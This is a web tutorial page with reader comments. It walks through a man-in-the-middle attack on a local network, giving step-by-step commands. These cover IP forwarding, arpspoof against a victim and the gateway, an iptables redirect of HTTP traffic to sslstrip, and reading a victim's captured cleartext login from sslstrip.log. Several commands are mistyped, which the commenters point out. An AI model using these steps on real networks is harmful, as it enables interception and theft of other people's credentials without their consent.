Tutorial: Using SSLSTRIP in a “Man in the Middle” Attack

June 23, 2015 | Views: 110568

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

SSLSTRIP in a Man in the Middle Attack


Hello guys,

In this tutorial, I’m going to teach you how to use a SSLSTRIP via the Kali OS.

We’ll use SSLSTRIP for sniff or steal password in a Target PC via LAN (Local Area Network). SSLSTRIP is known in hijacking HTTP traffic on a network. For testing, we’ll try to use VMWARE and download the Kali Operating System. I’m using BT5 (Backtrack) in my presentation.



1. Kali OS  – Click here

2. Syntax Code from the Author of the SSLSTRIP

3. Common sense


We’re assuming SSLSTRIP is already installed in Kali Operating system:

Step 1: Open Terminal


Step 2: In order to run SSLSTRIP in MITM, you need to know the Target IP and the IP of Gateway of the router. To find the router gateway IP, here’s the code:

route -n


netstat -nr


Step 3: Port forward for accept packets and forward as vise versa

disabled = 0

enabled = 1

Code: echo “1” > /proc/sys/net/ipv4/ip_forward

See image below:

image 1


Step 4: In a real attack, we’d be using ARPSPOOF against the layer 2 segments. In the images below, I modified the $routerip, but we make a simple instruction. At step 2, we find the router IP is To use ARSPOOF, follow this code.

Code: arpspoof -i eth0 -t victimip routerip

See images below:

image 2
three 3

Note: The $routerip was already modified in advanced tutorial. Don’t follow the image – you can use this example:

Code: arpspoof -t eth0 -t = victim ip =router ip or gateway


Step 5: Modify the IP table. Let’s understand iptables: iptables take traffic inbound to our Kali Linux machine, on which the destination is port 80 (also known as the HTTP web port. It redirects traffic to the port 1000, which is listening through the use of SSLSTRIP).

Code: iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 1000

See image below:

imahe 4


Step 6: Voila, peak time. We’re going to open our SSLSTRIP.

In Kali:

Application -> kali linux -> information gathering ->sslstrip analysis – >sslstrip

In BT:

Application -> Backtrack -> Exploitation tools -> Web Exploitation Tools ->ssltrip

See the image below:
image 5

Run the following to start the SSLSTRIP, which we set at port 1000.

In Kali:
Code: sslstrip -l 1000

In BT:
Code: python sslstrip.pl –l 1000


Step 7: An example of Victim login at hotmail.com.

See image below:
image 6


Step 8: Open the sslstrip.log

See image below:

image 7

The username and password is in cleartext – the blur portion in picture.


Thank you!

Regards from Philippine Security Researcher



Share with Friends
Use Cybytes and
Tip the Author!
Share with Friends
Ready to share your knowledge and expertise?
  1. Nice it works, but Iptables are wrong. You have to put — instead of -:

    iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 1000


  2. Note: The $routerip was already modified in advanced tutorial. Don’t follow the image – you can use this example:

    Code: arpspoof -t eth0 -t = victim ip =router ip or gateway

    it looks like this applies to the old version.

    in the new version arpspoof -i (interface) -c (own/host/both) -t (target) -r host

    but ı cant understand
    what to write to -c what is own/host/both

  3. it seems to just Ddos my broswers

Page 4 of 4«1234
Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge


We recommend always using caution when following any link

Are you sure you want to continue?